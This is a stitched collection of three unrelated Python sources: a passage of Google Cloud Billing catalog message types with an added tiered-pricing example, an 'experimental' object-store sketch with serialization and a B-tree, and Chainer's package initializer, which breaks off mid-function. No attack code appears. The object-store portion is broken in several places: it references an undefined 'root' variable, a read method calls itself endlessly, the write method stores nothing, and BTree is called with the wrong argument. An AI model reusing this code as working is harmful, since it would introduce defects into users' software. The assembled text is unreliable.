https://cloud.google.com/about/locations/
pricing_info (Sequence[google.cloud.billing_v1.types.PricingInfo]):
A timeline of pricing info for this SKU in
chronological order.
service_provider_name (str):
Identifies the service provider.
This is 'Google' for first party services in
Google Cloud Platform.
"""
name = proto.Field(proto.STRING, number=1,)
sku_id = proto.Field(proto.STRING, number=2,)
description = proto.Field(proto.STRING, number=3,)
category = proto.Field(proto.MESSAGE, number=4, message="Category",)
service_regions = proto.RepeatedField(proto.STRING, number=5,)
pricing_info = proto.RepeatedField(proto.MESSAGE, number=6, message="PricingInfo",)
service_provider_name = proto.Field(proto.STRING, number=7,)
class Category(proto.Message):
r"""Represents the category hierarchy of a SKU.
Attributes:
service_display_name (str):
The display name of the service this SKU
belongs to.
resource_family (str):
The type of product the SKU refers to.
Example: "Compute", "Storage", "Network",
"ApplicationServices" etc.
resource_group (str):
A group classification for related SKUs.
Example: "RAM", "GPU", "Prediction", "Ops",
"GoogleEgress" etc.
usage_type (str):
Represents how the SKU is consumed.
Example: "OnDemand", "Preemptible", "Commit1Mo",
"Commit1Yr" etc.
"""
service_display_name = proto.Field(proto.STRING, number=1,)
resource_family = proto.Field(proto.STRING, number=2,)
resource_group = proto.Field(proto.STRING, number=3,)
usage_type = proto.Field(proto.STRING, number=4,)
class PricingInfo(proto.Message):
r"""Represents the pricing information for a SKU at a single
point of time.
Attributes:
effective_time (google.protobuf.timestamp_pb2.Timestamp):
The timestamp from which this pricing was effective within
the requested time range. This is guaranteed to be greater
than or equal to the start_time field in the request and
less than the end_time field in the request. If a time range
was not specified in the request this field will be
equivalent to a time within the last 12 hours, indicating
the latest pricing info.
summary (str):
An optional human readable summary of the
pricing information, has a maximum length of 256
characters.
pricing_expression (google.cloud.billing_v1.types.PricingExpression):
Expresses the pricing formula. See ``PricingExpression`` for
an example.
aggregation_info (google.cloud.billing_v1.types.AggregationInfo):
Aggregation Info. This can be left
unspecified if the pricing expression doesn't
require aggregation.
currency_conversion_rate (float):
Conversion rate used for currency conversion, from USD to
the currency specified in the request. This includes any
surcharge collected for billing in non USD currency. If a
currency is not specified in the request this defaults to
1.0. Example: USD \* currency_conversion_rate = JPY
"""
effective_time = proto.Field(
proto.MESSAGE, number=1, message=timestamp_pb2.Timestamp,
)
summary = proto.Field(proto.STRING, number=2,)
pricing_expression = proto.Field(
proto.MESSAGE, number=3, message="PricingExpression",
)
aggregation_info = proto.Field(proto.MESSAGE, number=4, message="AggregationInfo",)
currency_conversion_rate = proto.Field(proto.DOUBLE, number=5,)
class PricingExpression(proto.Message):
r"""Expresses a mathematical pricing formula. For Example:-
``usage_unit: GBy`` ``tiered_rates:``
``[start_usage_amount: 20, unit_price: $10]``
``[start_usage_amount: 100, unit_price: $5]``
The above expresses a pricing formula where the first 20GB is free,
the next 80GB is priced at $10 per GB followed by $5 per GB for
additional usage.
Attributes:
usage_unit (str):
The short hand for unit of usage this pricing is specified
in. Example: usage_unit of "GiBy" means that usage is
specified in "Gibi Byte".
usage_unit_description (str):
The unit of usage in human readable form.
Example: "gibi byte".
base_unit (str):
The base unit for the SKU which is the unit
used in usage exports. Example: "By".
base_unit_description (str):
The base unit in human readable form.
Example: "byte".
base_unit_conversion_factor (float):
Conversion factor for converting from price per usage_unit
to price per base_unit, and start_usage_amount to
start_usage_amount in base_unit. unit_price /
base_unit_conversion_factor = price per base_unit.
start_usage_amount \* base_unit_conversion_factor =
start_usage_amount in base_unit.
display_quantity (float):
The recommended quantity of units for displaying pricing
info. When displaying pricing info it is recommended to
display: (unit_price \* display_quantity) per
display_quantity usage_unit. This field does not affect the
pricing formula and is for display purposes only. Example:
If the unit_price is "0.0001 USD", the usage_unit is "GB"
and the display_quantity is "1000" then the recommended way
of displaying the pricing info is "0.10 USD per 1000 GB".
tiered_rates (Sequence[google.cloud.billing_v1.types.PricingExpression.TierRate]):
The list of tiered rates for this pricing. The total cost is
computed by applying each of the tiered rates on usage. This
repeated list is sorted by ascending order of
start_usage_amount.
"""
class TierRate(proto.Message):
r"""The price rate indicating starting usage and its
corresponding price.
Attributes:
start_usage_amount (float):
Usage is priced at this rate only after this amount.
Example: start_usage_amount of 10 indicates that the usage
will be priced at the unit_price after the first 10
usage_units.
unit_price (google.type.money_pb2.Money):
The price per unit of usage. Example: unit_price of amount
$10 indicates that each unit will cost $10.
"""
start_usage_amount = proto.Field(proto.DOUBLE, number=1,)
unit_price = proto.Field(proto.MESSAGE, number=2, message=money_pb2.Money,)
usage_unit = proto.Field(proto.STRING, number=1,)
usage_unit_description = proto.Field(proto.STRING, number=4,)
base_unit = proto.Field(proto.STRING, number=5,)
base_unit_description = proto.Field(proto.STRING, number=6,)
base_unit_conversion_factor = proto.Field(proto.DOUBLE, number=7,)
display_quantity = proto.Field(proto.DOUBLE, number=2,)
tiered_rates = proto.RepeatedField(proto.MESSAGE, number=3, message=TierRate,)
class AggregationInfo(proto.Message):
r"""Represents the aggregation level and interval for pricing of
a single SKU.
Attributes:
aggregation_level (google.cloud.billing_v1.types.AggregationInfo.AggregationLevel):
aggregation_interval (google.cloud.billing_v1.types.AggregationInfo.AggregationInterval):
aggregation_count (int):
The number of intervals to aggregate over. Example: If
aggregation_level is "DAILY" and aggregation_count is 14,
aggregation will be over 14 days.
"""
class AggregationLevel(proto.Enum):
r"""The level at which usage is aggregated to compute cost.
Example: "ACCOUNT" aggregation level indicates that usage for
tiered pricing is aggregated across all projects in a single
account.
"""
AGGREGATION_LEVEL_UNSPECIFIED = 0
ACCOUNT = 1
PROJECT = 2
class AggregationInterval(proto.Enum):
r"""The interval at which usage is aggregated to compute cost.
Example: "MONTHLY" aggregation interval indicates that usage for
tiered pricing is aggregated every month.
"""
AGGREGATION_INTERVAL_UNSPECIFIED = 0
DAILY = 1
MONTHLY = 2
aggregation_level = proto.Field(proto.ENUM, number=1, enum=AggregationLevel,)
aggregation_interval = proto.Field(proto.ENUM, number=2, enum=AggregationInterval,)
aggregation_count = proto.Field(proto.INT32, number=3,)
class ListServicesRequest(proto.Message):
r"""Request message for ``ListServices``.
Attributes:
page_size (int):
Requested page size. Defaults to 5000.
page_token (str):
A token identifying a page of results to return. This should
be a ``next_page_token`` value returned from a previous
``ListServices`` call. If unspecified, the first page of
results is returned.
"""
page_size = proto.Field(proto.INT32, number=1,)
page_token = proto.Field(proto.STRING, number=2,)
class ListServicesResponse(proto.Message):
r"""Response message for ``ListServices``.
Attributes:
services (Sequence[google.cloud.billing_v1.types.Service]):
A list of services.
next_page_token (str):
A token to retrieve the next page of results. To retrieve
the next page, call ``ListServices`` again with the
``page_token`` field set to this value. This field is empty
if there are no more results to retrieve.
"""
@property
def raw_page(self):
return self
services = proto.RepeatedField(proto.MESSAGE, number=1, message="Service",)
next_page_token = proto.Field(proto.STRING, number=2,)
class ListSkusRequest(proto.Message):
r"""Request message for ``ListSkus``.
Attributes:
parent (str):
Required. The name of the service.
Example: "services/DA34-426B-A397".
start_time (google.protobuf.timestamp_pb2.Timestamp):
Optional inclusive start time of the time range for which
the pricing versions will be returned. Timestamps in the
future are not allowed. The time range has to be within a
single calendar month in America/Los_Angeles timezone. Time
range as a whole is optional. If not specified, the latest
pricing will be returned (up to 12 hours old at most).
end_time (google.protobuf.timestamp_pb2.Timestamp):
Optional exclusive end time of the time range for which the
pricing versions will be returned. Timestamps in the future
are not allowed. The time range has to be within a single
calendar month in America/Los_Angeles timezone. Time range
as a whole is optional. If not specified, the latest pricing
will be returned (up to 12 hours old at most).
currency_code (str):
The ISO 4217 currency code for the pricing info in the
response proto. Will use the conversion rate as of
start_time. Optional. If not specified USD will be used.
page_size (int):
Requested page size. Defaults to 5000.
page_token (str):
A token identifying a page of results to return. This should
be a ``next_page_token`` value returned from a previous
``ListSkus`` call. If unspecified, the first page of results
is returned.
"""
parent = proto.Field(proto.STRING, number=1,)
start_time = proto.Field(proto.MESSAGE, number=2, message=timestamp_pb2.Timestamp,)
end_time = proto.Field(proto.MESSAGE, number=3, message=timestamp_pb2.Timestamp,)
currency_code = proto.Field(proto.STRING, number=4,)
page_size = proto.Field(proto.INT32, number=5,)
page_token = proto.Field(proto.STRING, number=6,)
class ListSkusResponse(proto.Message):
r"""Response message for ``ListSkus``.
Attributes:
skus (Sequence[google.cloud.billing_v1.types.Sku]):
The list of public SKUs of the given service.
next_page_token (str):
A token to retrieve the next page of results. To retrieve
the next page, call ``ListSkus`` again with the
``page_token`` field set to this value. This field is empty
if there are no more results to retrieve.
"""
@property
def raw_page(self):
return self
skus = proto.RepeatedField(proto.MESSAGE, number=1, message="Sku",)
next_page_token = proto.Field(proto.STRING, number=2,)
__all__ = tuple(sorted(__protobuf__.manifest))
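# --- Hedged sketch (illustration only; not part of the generated types above). It shows
# how the tiered_rates described in the PricingExpression docstring are commonly applied.
# The helper, tier values, and usage amount are made-up for demonstration; real values
# come from the Cloud Billing Catalog API.
def _tiered_cost(usage, tiers):
    """tiers: list of (start_usage_amount, unit_price), sorted by start_usage_amount."""
    cost = 0.0
    for i, (start, price) in enumerate(tiers):
        upper = tiers[i + 1][0] if i + 1 < len(tiers) else float('inf')
        if usage > start:
            cost += (min(usage, upper) - start) * price
    return cost

if __name__ == '__main__':
    # First 20 units free, the next 80 at $10 per unit, anything above 100 at $5.
    tiers = [(0, 0.0), (20, 10.0), (100, 5.0)]
    print(_tiered_cost(150, tiers))  # (20 * 0) + (80 * 10) + (50 * 5) = 1050.0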
|
|
'''
Experimental embedded object-store sketch: typed value serialization, block-backed
file storage, and an in-memory B-tree.
'''
import os
import bisect
import itertools
import functools
import operator
import enum
import sys
import lzma
import queue
import threading
import time
import hashlib
import random
import re
@enum.unique
class Op(enum.Enum):
'''
Opcode bytes used to tag serialized values and operations.
'''
def __init__(self, *args):  # Enum passes the member value here
'''
doc
'''
super().__init__()
object = b'\x01'
number = b'\x02'
real = b'\x03'
array = b'\x04'
string = b'\x05'
true = b'\x06'
false = b'\x07'
custom = b'\x08'
null = b'\x09'
append = b'\x0A'
replace = b'\x0B'
ref_value = b'\x0C'
ref_append = b'\x0D'
ref_replace = b'\x0E'
def generate_uuid():
'''
Generate a random version-4 UUID string (36 characters including hyphens).
'''
mapping = {8: '-', 13: '-', 14: '4', 18: '-', 23: '-'}
mapping[19] = random.SystemRandom().choice('89AB')
return ''.join(
mapping.get(i) or random.SystemRandom().choice('0123456789ABCDEF')
for i in range(36))
class Database:
'''
doc
'''
def __init__(self, folder, nblock, sblock):
'''
doc
'''
self.blocks = Blocks(folder, nblock, sblock)
block_size = 1024 * 1024 * sblock
if len(root.data) == 0:
root.append_data(b''.join((
b'\x01\xFF', b'\x00' * (block_size - 2))))
if len(root.data) != block_size:
raise ValueError('block size of {}MB does not match {}'.format(
sblock, os.path.join(folder, 'ROOT')
))
self.folder = folder
self.sblock = sblock
self.offset_length = block_size.bit_length() // 8 + 1
def read(self, db, table):
'''
doc
'''
return self.read(db, table)
def write(self, db, table, obj):
'''
doc
'''
self.obj = write_dict({'public': {db: {table: [obj]}}}, self)
def update(self, db, table, old, new):
'''
doc
'''
def delete(self, db, table, obj):
'''
doc
'''
def write_op(self, op):
'''
doc
'''
return self.write_bytes(op.value + b'\xFF\xFF')
def write_var_obj(self, op, bytes_):
'''
doc
'''
return self.write_bytes(create_var_obj(op, bytes_))
def write_bytes(self, bytes_):
'''
doc
'''
offset = bytes(self.offset_length)
file = bytes(32)
port = bytes(4)
ref = port + file + offset
return ref
def get_length(bytes_):
'''
doc
'''
i = len(bytes_)
while i:
i, b = divmod(i, 0xFF)
yield b
def create_var_obj(op, bytes_):
'''
doc
'''
bytes_ = lzma.compress(bytes_)
return b'\xFF'.join((op.value, bytes(get_length(bytes_)), bytes_))
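# --- Hedged sketch (standalone): round-tripping the length encoding produced by
# get_length() above. It yields base-255 digits, least significant first, presumably so
# that the 0xFF separator used by create_var_obj() can never appear inside the length
# field. The decoder below is an illustration and is not defined elsewhere.
def _decode_length(digits):
    return sum(b * (0xFF ** i) for i, b in enumerate(digits))

if __name__ == '__main__':
    assert _decode_length(get_length(b'x' * 300)) == 300
    assert _decode_length(get_length(b'x' * 255)) == 255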
@functools.singledispatch
def write_val(value, db):
'''
doc
'''
raise NotImplementedError(type(value))
@write_val.register(bool)
def write_bool(bool_, db):
'''
doc
'''
return db.write_op(Op.true if bool_ else Op.false)
@write_val.register(type(None))
def write_None(_, db):
'''
doc
'''
return db.write_op(Op.null)
@write_val.register(int)
def write_integer(integer, db):
'''
doc
'''
return db.write_var_obj(
Op.number,
integer.to_bytes(
integer.bit_length() // 8 + 1,
sys.byteorder,
signed=True
)
)
@write_val.register(float)
def write_float(float_, db):
'''
doc
'''
num, den = float_.as_integer_ratio()
length = max(num.bit_length(), den.bit_length()) // 8 + 1
return db.write_var_obj(
Op.real,
b''.join((
num.to_bytes(length, sys.byteorder, signed=True),
den.to_bytes(length, sys.byteorder, signed=True)
))
)
@write_val.register(str)
def write_string(string, db):
'''
doc
'''
return db.write_var_obj(Op.string, string.encode())
@write_val.register(dict)
def write_dict(dict_, db):
'''
doc
'''
return db.write_var_obj(
Op.object,
BTree({
key: write_val(value, db)
for key, value in dict_.items()
}).encode()
)
@write_val.register(list)
def write_list(list_, db):
'''
doc
'''
return db.write_var_obj(
Op.array,
b''.join(map(
write_val,
list_,
itertools.repeat(db)
))
)
class Snapshot:
'''
doc
'''
queue = queue.Queue()
def __init__(self):
'''
doc
'''
self.queue.put(self)
def commit(self):
'''
doc
'''
class Blocks:
'''
File-backed storage blocks with a simple in-memory cache keyed by file name.
'''
def __init__(self, folder, nblock, sblock):
'''
doc
'''
self.sblock = sblock
self.nblock = nblock
self.folder = folder
data = bytearray()
try:
with open(os.path.join(folder, 'ROOT'), 'rb') as io:
data += io.read()
except FileNotFoundError:
with open(os.path.join(folder, 'ROOT'), 'wb') as io:
pass
self.table = {'ROOT': data}
self.lru = {time.time(): 'ROOT'}
def read_from(self, file, start, length):
'''
doc
'''
data = bytearray()
try:
data = self.table[file]
except KeyError:
try:
with open(os.path.join(self.folder, file), 'rb') as io:
data = io.read()
except FileNotFoundError:
with open(os.path.join(self.folder, file), 'wb') as io:
pass
data = bytearray(self.sblock)
self.table[file] = data
self.lru[time.time()] = file
return data[start: start + length]
def append_data(self, file, start, blob):
'''
doc
'''
try:
self.table[file][start: start + len(blob)] = blob
with open(os.path.join(self.folder, file), 'wb') as io:
io.write(self.table[file])
except KeyError:
try:
with open(os.path.join(self.folder, file), 'rb') as io:
data = io.read()
except FileNotFoundError:
data = bytearray(self.sblock)
finally:
data[start: start + len(blob)] = blob
with open(os.path.join(self.folder, file), 'wb') as io:
io.write(data)
class _BNode(object):
'''
A single B-tree node holding sorted contents and child links.
'''
__slots__ = ["tree", "contents", "children"]
def __init__(self, tree, contents=None, children=None):
'''
doc
'''
self.tree = tree
self.contents = contents or []
self.children = children or []
if self.children:
assert len(self.contents) + 1 == len(self.children), \
"one more child than data item required"
def compose(self):
'''
doc
'''
if self.children:
children = iter(self.children)
yield tuple(next(children).compose())
for content in self.contents:
yield content
yield tuple(next(children).compose())
else:
yield from self.contents
def lateral(self, parent, parent_index, dest, dest_index):
'''
doc
'''
if parent_index > dest_index:
dest.contents.append(parent.contents[dest_index])
parent.contents[dest_index] = self.contents.pop(0)
if self.children:
dest.children.append(self.children.pop(0))
else:
dest.contents.insert(0, parent.contents[parent_index])
parent.contents[parent_index] = self.contents.pop()
if self.children:
dest.children.insert(0, self.children.pop())
def shrink(self, ancestors):
'''
doc
'''
parent = None
if ancestors:
parent, parent_index = ancestors.pop()
# try to lend to the left neighboring sibling
if parent_index:
left_sib = parent.children[parent_index - 1]
if len(left_sib.contents) < self.tree.order:
self.lateral(
parent, parent_index, left_sib, parent_index - 1)
return
# try the right neighbor
if parent_index + 1 < len(parent.children):
right_sib = parent.children[parent_index + 1]
if len(right_sib.contents) < self.tree.order:
self.lateral(
parent, parent_index, right_sib, parent_index + 1)
return
center = len(self.contents) // 2
sibling, push = self.split()
if not parent:
parent, parent_index = self.tree.BRANCH(
self.tree, children=[self]), 0
self.tree._root = parent
# pass the median up to the parent
parent.contents.insert(parent_index, push)
parent.children.insert(parent_index + 1, sibling)
if len(parent.contents) > parent.tree.order:
parent.shrink(ancestors)
def grow(self, ancestors):
'''
doc
'''
parent, parent_index = ancestors.pop()
minimum = self.tree.order // 2
left_sib = right_sib = None
# try to borrow from the right sibling
if parent_index + 1 < len(parent.children):
right_sib = parent.children[parent_index + 1]
if len(right_sib.contents) > minimum:
right_sib.lateral(parent, parent_index + 1, self, parent_index)
return
# try to borrow from the left sibling
if parent_index:
left_sib = parent.children[parent_index - 1]
if len(left_sib.contents) > minimum:
left_sib.lateral(parent, parent_index - 1, self, parent_index)
return
# consolidate with a sibling - try left first
if left_sib:
left_sib.contents.append(parent.contents[parent_index - 1])
left_sib.contents.extend(self.contents)
if self.children:
left_sib.children.extend(self.children)
parent.contents.pop(parent_index - 1)
parent.children.pop(parent_index)
else:
self.contents.append(parent.contents[parent_index])
self.contents.extend(right_sib.contents)
if self.children:
self.children.extend(right_sib.children)
parent.contents.pop(parent_index)
parent.children.pop(parent_index + 1)
if len(parent.contents) < minimum:
if ancestors:
# parent is not the root
parent.grow(ancestors)
elif not parent.contents:
# parent is root, and its now empty
self.tree._root = left_sib or self
def split(self):
'''
doc
'''
center = len(self.contents) // 2
median = self.contents[center]
sibling = type(self)(
self.tree,
self.contents[center + 1:],
self.children[center + 1:])
self.contents = self.contents[:center]
self.children = self.children[:center + 1]
return sibling, median
def insert(self, index, item, ancestors):
'''
doc
'''
self.contents.insert(index, item)
if len(self.contents) > self.tree.order:
self.shrink(ancestors)
def remove(self, index, ancestors):
'''
doc
'''
minimum = self.tree.order // 2
if self.children:
# try promoting from the right subtree first,
# but only if it won't have to resize
additional_ancestors = [(self, index + 1)]
descendent = self.children[index + 1]
while descendent.children:
additional_ancestors.append((descendent, 0))
descendent = descendent.children[0]
if len(descendent.contents) > minimum:
ancestors.extend(additional_ancestors)
self.contents[index] = descendent.contents[0]
descendent.remove(0, ancestors)
return
# fall back to the left child
additional_ancestors = [(self, index)]
descendent = self.children[index]
while descendent.children:
additional_ancestors.append(
(descendent, len(descendent.children) - 1))
descendent = descendent.children[-1]
ancestors.extend(additional_ancestors)
self.contents[index] = descendent.contents[-1]
descendent.remove(len(descendent.children) - 1, ancestors)
else:
self.contents.pop(index)
if len(self.contents) < minimum and ancestors:
self.grow(ancestors)
class BTree:
'''
In-memory B-tree supporting insert, remove, membership tests, in-order iteration,
and bulk loading from sorted items.
'''
BRANCH = LEAF = _BNode
def __init__(self, order):
'''
doc
'''
self.order = order
self._root = self._bottom = self.LEAF(self)
def _path_to(self, item):
'''
doc
'''
current = self._root
ancestry = []
while getattr(current, "children", None):
index = bisect.bisect_left(current.contents, item)
ancestry.append((current, index))
if index < len(current.contents) \
and current.contents[index] == item:
return ancestry
current = current.children[index]
index = bisect.bisect_left(current.contents, item)
ancestry.append((current, index))
present = index < len(current.contents)
present = present and current.contents[index] == item
return ancestry
def _present(self, item, ancestors):
'''
doc
'''
last, index = ancestors[-1]
return index < len(last.contents) and last.contents[index] == item
def insert(self, item):
'''
doc
'''
current = self._root
ancestors = self._path_to(item)
node, index = ancestors[-1]
while getattr(node, "children", None):
node = node.children[index]
index = bisect.bisect_left(node.contents, item)
ancestors.append((node, index))
node, index = ancestors.pop()
node.insert(index, item, ancestors)
def remove(self, item):
'''
doc
'''
current = self._root
ancestors = self._path_to(item)
if self._present(item, ancestors):
node, index = ancestors.pop()
node.remove(index, ancestors)
else:
raise ValueError("%r not in %s" % (item, self.__class__.__name__))
def __contains__(self, item):
'''
doc
'''
return self._present(item, self._path_to(item))
def __iter__(self):
'''
doc
'''
def _recurse(node):
if node.children:
for child, item in zip(node.children, node.contents):
for child_item in _recurse(child):
yield child_item
yield item
for child_item in _recurse(node.children[-1]):
yield child_item
else:
for item in node.contents:
yield item
for item in _recurse(self._root):
yield item
def compose(self):
'''
doc
'''
return tuple(self._root.compose())
@classmethod
def bulkload(cls, items, order):
'''
doc
'''
tree = object.__new__(cls)
tree.order = order
leaves, seps = tree._build_bulkloaded_leaves(items)
tree._build_bulkloaded_branches(leaves, seps)
return tree
def _build_bulkloaded_leaves(self, items):
'''
doc
'''
minimum = self.order // 2
leaves, seps = [[]], []
for item in items:
if len(leaves[-1]) < self.order:
leaves[-1].append(item)
else:
seps.append(item)
leaves.append([])
if len(leaves[-1]) < minimum and seps:
last_two = leaves[-2] + [seps.pop()] + leaves[-1]
leaves[-2] = last_two[:minimum]
leaves[-1] = last_two[minimum + 1:]
seps.append(last_two[minimum])
return [self.LEAF(self, contents=node) for node in leaves], seps
def _build_bulkloaded_branches(self, leaves, seps):
'''
doc
'''
minimum = self.order // 2
levels = [leaves]
while len(seps) > self.order + 1:
items, nodes, seps = seps, [[]], []
for item in items:
if len(nodes[-1]) < self.order:
nodes[-1].append(item)
else:
seps.append(item)
nodes.append([])
if len(nodes[-1]) < minimum and seps:
last_two = nodes[-2] + [seps.pop()] + nodes[-1]
nodes[-2] = last_two[:minimum]
nodes[-1] = last_two[minimum + 1:]
seps.append(last_two[minimum])
offset = 0
for i, node in enumerate(nodes):
children = levels[-1][offset:offset + len(node) + 1]
nodes[i] = self.BRANCH(self, contents=node, children=children)
offset += len(node) + 1
levels.append(nodes)
self._root = self.BRANCH(self, contents=seps, children=levels[-1])
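# --- Hedged sketch (standalone usage of the BTree above; the values are arbitrary):
if __name__ == '__main__':
    tree = BTree(order=4)
    for value in [17, 3, 99, 42, 8, 23, 61]:
        tree.insert(value)
    tree.remove(42)
    assert 23 in tree and 42 not in tree
    # In-order traversal yields the items in sorted order.
    print(list(tree))  # [3, 8, 17, 23, 61, 99]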
|
|
from __future__ import absolute_import
import collections
import os
import threading
import warnings as builtin_warnings
import numpy
from chainer import _version
from chainer import backends # NOQA
from chainer import dataset # NOQA
from chainer import datasets # NOQA
from chainer import distributions # NOQA
from chainer import function_hooks # NOQA
from chainer import functions # NOQA
from chainer import graph_optimizations # NOQA
from chainer import initializers # NOQA
from chainer import iterators # NOQA
from chainer import links # NOQA
from chainer import optimizers # NOQA
from chainer import serializers # NOQA
from chainer import training # NOQA
from chainer import variable # NOQA
from chainer import warnings # NOQA
# import class and function
# These functions from backends.cuda are kept for backward compatibility
from chainer._backprop import backward # NOQA
from chainer._runtime_info import print_runtime_info # NOQA
from chainer.backend import get_device # NOQA
from chainer.backend import using_device # NOQA
from chainer.backends.cuda import should_use_cudnn # NOQA
from chainer.backends.cuda import should_use_cudnn_tensor_core # NOQA
from chainer.configuration import config # NOQA
from chainer.configuration import global_config # NOQA
from chainer.configuration import using_config # NOQA
from chainer.device_resident import DeviceResident # NOQA
from chainer.distribution import cross_entropy # NOQA
from chainer.distribution import Distribution # NOQA
from chainer.distribution import kl_divergence # NOQA
from chainer.distribution import register_kl # NOQA
from chainer.function import force_backprop_mode # NOQA
from chainer.function import Function # NOQA
from chainer.function import FunctionAdapter # NOQA
from chainer.function import no_backprop_mode # NOQA
from chainer.function_hook import FunctionHook # NOQA
from chainer.function_node import FunctionNode # NOQA
from chainer.function_node import grad # NOQA
from chainer.functions import array # NOQA
from chainer.functions.math import basic_math # NOQA
from chainer.graph_optimizations.static_graph import static_graph # NOQA
from chainer.graph_optimizations.static_graph_utilities import static_code # NOQA
from chainer.initializer import Initializer # NOQA
from chainer.link import Chain # NOQA
from chainer.link import ChainList # NOQA
from chainer.link import Link # NOQA
from chainer.link_hook import LinkHook # NOQA
from chainer.optimizer import GradientMethod # NOQA
from chainer.optimizer import Optimizer # NOQA
from chainer.optimizer import UpdateRule # NOQA
from chainer.reporter import DictSummary # NOQA
from chainer.reporter import get_current_reporter # NOQA
from chainer.reporter import report # NOQA
from chainer.reporter import report_scope # NOQA
from chainer.reporter import Reporter # NOQA
from chainer.reporter import Summary # NOQA
from chainer.sequential import Sequential # NOQA
from chainer.serializer import AbstractSerializer # NOQA
from chainer.serializer import Deserializer # NOQA
from chainer.serializer import Serializer # NOQA
from chainer.variable import as_array # NOQA
from chainer.variable import as_variable # NOQA
from chainer.variable import Parameter # NOQA
from chainer.variable import Variable # NOQA
# Alias for backward compatibility
from chainer import cuda # NOQA
from chainer import _environment_check
import chainerx
# Introduce an alias that cannot be declared at the original place due to
# circular imports.
import chainer.utils.walker_alias
chainer.utils.WalkerAlias = chainer.utils.walker_alias.WalkerAlias
del chainer
# Check environment conditions
_environment_check.check()
__version__ = _version.__version__
_thread_local = threading.local()
_array_types = None
_cpu_array_types = None
# Used in chainer.FunctionNode.forward_chainerx().
# This value is returned to indicate that the function does not support forward
# computation in ChainerX implementation with given input arrays and other
# arguments.
class _FallbackType(object):
def __repr__(self):
return 'Fallback'
Fallback = _FallbackType()
def get_function_hooks():
try:
ret = _thread_local.function_hooks
except AttributeError:
ret = collections.OrderedDict()
_thread_local.function_hooks = ret
return ret
def _get_link_hooks():
try:
ret = _thread_local.link_hooks
except AttributeError:
ret = collections.OrderedDict()
_thread_local.link_hooks = ret
return ret
def _load_array_types():
# Note: this function may not be protected by GIL because of external
# calls.
global _array_types
global _cpu_array_types
if _array_types is None:
array_types = [numpy.ndarray]
cpu_array_types = [numpy.ndarray]
if backends.cuda.available:
array_types.append(backends.cuda.ndarray)
if backends.intel64.is_ideep_available():
array_types.append(backends.intel64.mdarray)
cpu_array_types.append(backends.intel64.mdarray)
if chainerx.is_available():
array_types.append(chainerx.ndarray)
cpu_array_types.append(chainerx.ndarray)
array_types = tuple(array_types)
cpu_array_types = tuple(cpu_array_types)
_array_types = array_types
_cpu_array_types = cpu_array_types
def get_array_types():
_load_array_types()
return _array_types
def get_cpu_array_types():
_load_array_types()
return _cpu_array_types
# TODO(hvy): Move this function to backend?
def is_arrays_compatible(arrays):
# Do not use this function to check if a single object is an array or
# not. Use isinstance(obj, chainer.get_array_types()) instead.
arrays = [a for a in arrays if a is not None]
if not arrays:
return True
# If there's at least one chainerx.ndarray, all other arrays
# must be chainerx as well
are_chainerx = [isinstance(arr, chainerx.ndarray) for arr in arrays]
if chainerx.is_available() and any(are_chainerx):
return all(are_chainerx)
if isinstance(arrays[0], backends.cuda.ndarray):
types = backends.cuda.ndarray
else:
types = get_cpu_array_types()
return all([isinstance(a, types) for a in arrays])
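# Hedged illustration of the compatibility rules above (the array variables are
# placeholders, not defined in this module):
#   is_arrays_compatible([gpu_arr, cpu_arr])  # -> False (CuPy mixed with NumPy)
#   is_arrays_compatible([cpu_arr, None])     # -> True  (None entries are ignored)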
class _Mixed16(object):
dtype = numpy.dtype(numpy.float16)
def __repr__(self):
return "dtype('mixed16')"
mixed16 = _Mixed16()
"""Dtype-like object that represents 16/32 bits mixed precision float."""
global_config.debug = bool(int(os.environ.get('CHAINER_DEBUG', '0')))
global_config.cudnn_deterministic = False
global_config.warn_nondeterministic = False
global_config.enable_backprop = True
global_config.keep_graph_on_report = bool(int(
os.environ.get('CHAINER_KEEP_GRAPH_ON_REPORT', '0')))
global_config.train = True
global_config.type_check = bool(int(os.environ.get('CHAINER_TYPE_CHECK', '1')))
global_config.use_cudnn = os.environ.get('CHAINER_USE_CUDNN', 'auto')
global_config.use_cudnn_tensor_core = 'auto'
global_config.autotune = False
global_config.schedule_func = None
global_config.use_static_graph = True
global_config.use_ideep = os.environ.get('CHAINER_USE_IDEEP', 'never')
global_config.lazy_grad_sum = bool(int(
os.environ.get('CHAINER_LAZY_GRAD_SUM', '0')))
global_config.cudnn_fast_batch_normalization = bool(int(
os.environ.get('CHAINER_CUDNN_FAST_BATCH_NORMALIZATION', '0')))
_chainer_dtype = os.environ.get('CHAINER_DTYPE', 'float32')
if _chainer_dtype in ('float16', 'float32', 'float64'):
global_config.dtype = numpy.dtype(_chainer_dtype)
elif _chainer_dtype == 'mixed16':
global_config.dtype = mixed16
else:
    raise TypeError('incorrect dtype name in CHAINER_DTYPE: "{}". '
                    'Only float16/32/64 and mixed16 are allowed.'.format(_chainer_dtype))
global_config.in_recomputing = False
global_config._will_recompute = False
global_config.compute_mode = None
def is_debug():
"""Returns if the debug mode is enabled or not in the current thread.
Returns:
bool: ``True`` if the debug mode is enabled.
"""
return bool(config.__getattr__('debug'))
def set_debug(debug):
"""Enables or disables the debug mode in the current thread.
.. note::
``chainer.set_debug(value)`` is equivalent to
``chainer.config.debug = value``.
Args:
debug (bool): New debug mode.
"""
config.debug = debug
class DebugMode(object):
"""Debug mode context.
This class provides a context manager for debug mode. When entering the
context, it sets the debug mode to the value of `debug` parameter with
memorizing its original value. When exiting the context, it sets the debug
mode back to the original value.
.. deprecated:: v2.0.0
Use :func:`chainer.using_config` instead. See :ref:`debug` for details.
Args:
debug (bool): Debug mode used in the context.
"""
def __init__(self, debug):
builtin_warnings.warn(
'chainer.DebugMode is deprecated. '
'Use chainer.using_config("debug", ...) instead.',
DeprecationWarning)
self._using = using_config('debug', debug)
def __enter__(self):
self._using.__enter__()
def __exit__(self, *args):
self._using.__exit__(*args)
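# Hedged usage sketch: the deprecated ``with DebugMode(True): ...`` form above
# is equivalent to the recommended
#   with using_config('debug', True):
#       ...  # extra consistency checks are enabled for this thread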
def get_dtype(dtype=None, map_mixed16=None):
"""Resolves Chainer's default dtype.
Args:
dtype: Dtype specifier. If this value is specified (not ``None``),
this function returns the dtype object corresponding to it.
map_mixed16: Dtype specifier. When ``chainer.config.dtype`` is mixed16,
this option is used. If this value is ``None``, float16 is used.
Returns:
If ``dtype`` is not ``None``, it returns the dtype normalized by
``numpy.dtype()``. Otherwise, it returns ``chainer.config.dtype`` (see
:ref:`configuration`) normalized as well. When ``chainer.config.dtype``
is :data:`~chainer.mixed16` and ``map_mixed16`` is specified, it
returns the normalized version of ``map_mixed16``.
"""
if dtype is None:
dtype = config.dtype
